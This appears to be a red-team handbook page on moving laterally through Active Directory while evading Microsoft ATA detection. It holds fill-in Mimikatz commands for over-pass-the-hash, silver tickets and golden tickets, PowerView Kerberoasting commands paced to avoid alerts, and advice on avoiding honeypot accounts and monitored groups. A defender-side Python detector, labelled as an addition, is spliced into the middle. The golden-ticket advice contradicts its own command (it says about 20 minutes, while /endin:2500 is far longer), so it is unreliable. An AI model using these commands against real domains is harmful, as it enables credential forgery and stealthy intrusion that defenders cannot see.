# Lateral Movement

Most lateral movement techniques such as PsExec, PSRemoting, DCOM, and WMIexec are detected only when they produce "abnormal traffic." If a user already uses these technologies regularly (for example, help desk staff commonly RDP to workstations to fix technical problems), then using them is safe, because it is considered "normal behavior."

But there are other, stealthier ways to move laterally besides those technologies.

## Over-Pass-The-Hash

Using only NTLM hashes for Over-Pass-The-Hash (OPTH) will be flagged by ATA as an encryption downgrade or an unusual protocol implementation.

To generate Kerberos tickets that will not be flagged, supply both the NTLM hash and the AES keys, and set the lifetime of the ticket to a normal value:

```
kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /aes128:<AES128_KEY> /NTLM:<NTLM_HASH> /aes256:<AES256_KEY> /endin:600 /renewmax:300 /ptt
```

Note that you can supply all zeroes for the aes128 key and it will not be flagged.

## SQL

Moving laterally through SQL databases is not detected, because no traffic goes to the DC: all SQL authentication events are local to the server. We can find passwords and hashes of a privileged user, impersonate that user, and go on from there.

See [MS SQL](https://kwcsec.gitbook.io/the-red-team-handbook/infrastructure/sql/ms-sql).

## Silver Tickets

Kerberoasting combined with Silver Tickets is a good way to move laterally: Kerberoasting blends in with regular traffic, and a silver ticket involves no communication with the DC whatsoever, since it is a forged TGS.

Make sure to Kerberoast users slowly, as Kerberoasting everything at once causes spikes of traffic that may trigger alerts.

We can slowly enumerate user objects that have an SPN, one OU at a time:

```powershell
Get-DomainUser -SPN -SearchBase "ldap://OU=office,DC=..."
```

Then perform recon on groups that have access on various targets of interest:

```powershell
Get-DomainGroup -MemberIdentity <user>
```

And then Kerberoast that target if applicable:

```powershell
Get-DomainUser <user> | Get-DomainSPNTicket | fl *
```

Beware of honeypot SPNs: factor in last logon time, creation date, etc. to identify these types of accounts.

If we successfully crack the hash, we can then create a silver ticket:

```
kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /rc4:<NTLM_HASH> /endin:600 /renewmax:300 /service:<SERVICE> /target:<TARGET_COMPUTER> /ptt
```
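The two detection heuristics this page warns about (an RC4-only TGT request flagged as an encryption downgrade, and a burst of service-ticket requests flagged as a Kerberoasting spike), shown from the defender's side as an added example that is not part of the original page. The events are constructed to mirror Windows 4768/4769 audit fields; the field names, the 10-minute window and the threshold of 5 are assumptions and a simplified stand-in for ATA's real logic.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC (an NTLM-key derived ticket)

# Constructed sample events modelled on 4768 (TGT request) and 4769 (TGS request) fields.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "client": "10.0.0.5", "account": "alice", "etype": 0x12},
    {"id": 4768, "time": "2024-05-01T09:01:00", "client": "10.0.0.9", "account": "bob", "etype": 0x17},
    {"id": 4769, "time": "2024-05-01T09:02:00", "client": "10.0.0.5", "account": "alice",
     "service": "cifs/fs01", "etype": 0x12},
] + [
    # six RC4 service-ticket requests from one host within six minutes (a "roast everything" burst)
    {"id": 4769, "time": f"2024-05-01T09:0{i}:30", "client": "10.0.0.9", "account": "bob",
     "service": f"MSSQLSvc/db0{i}", "etype": 0x17}
    for i in range(2, 8)
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def rc4_tgt_requests(events):
    """(account, client) pairs whose TGT (4768) was issued with RC4 only.

    In an AES-capable domain this is the 'encryption downgrade' pattern that an
    NTLM-only over-pass-the-hash produces; supplying AES keys avoids it.
    """
    return sorted({(e["account"], e["client"]) for e in events
                   if e["id"] == 4768 and e["etype"] == RC4_HMAC})


def kerberoast_bursts(events, window=timedelta(minutes=10), threshold=5):
    """Per client, the peak number of distinct services requested with RC4 (4769)
    inside any sliding window; only clients reaching the threshold are returned.
    A slow roast keeps each window under the threshold and is not reported."""
    per_client = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC:
            per_client[e["client"]].append((_ts(e), e["service"]))
    bursts = {}
    for client, reqs in per_client.items():
        reqs.sort()
        peak = 0
        for i, (start, _) in enumerate(reqs):
            peak = max(peak, len({svc for t, svc in reqs[i:] if t - start <= window}))
        if peak >= threshold:
            bursts[client] = peak
    return bursts
```

Running the same events with a 2-minute window and threshold 5 returns nothing, which is the "slow Kerberoasting" case the page describes.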

## Modification of Sensitive Groups

If any of these sensitive groups are modified (for example, by adding an account or changing passwords), the change will be flagged as abnormal activity.

![](/files/-MgseOi_yaic_o0wpO9M)

As a result, we can target other privileged groups like SQL admins or Help desk users.

## Golden Tickets

The same logic that applies to silver tickets applies to golden tickets as well: if we supply only the NTLM hash, the ticket will be flagged as an encryption downgrade.

To avoid this, include all AES keys. Note that if the ticket stays valid for more than 8 hours, it is going to be flagged. So for extra stealth, create the ticket for about 20 minutes, use it, and destroy it immediately afterwards:

```
kerberos::golden /user:JohnVanwagoner /domain:prod.local /sid:sid /aes256:aes256 /groups:512,513,519 /startoffset:-1 /endin:2500 /renewmax:3000 /ptt
```
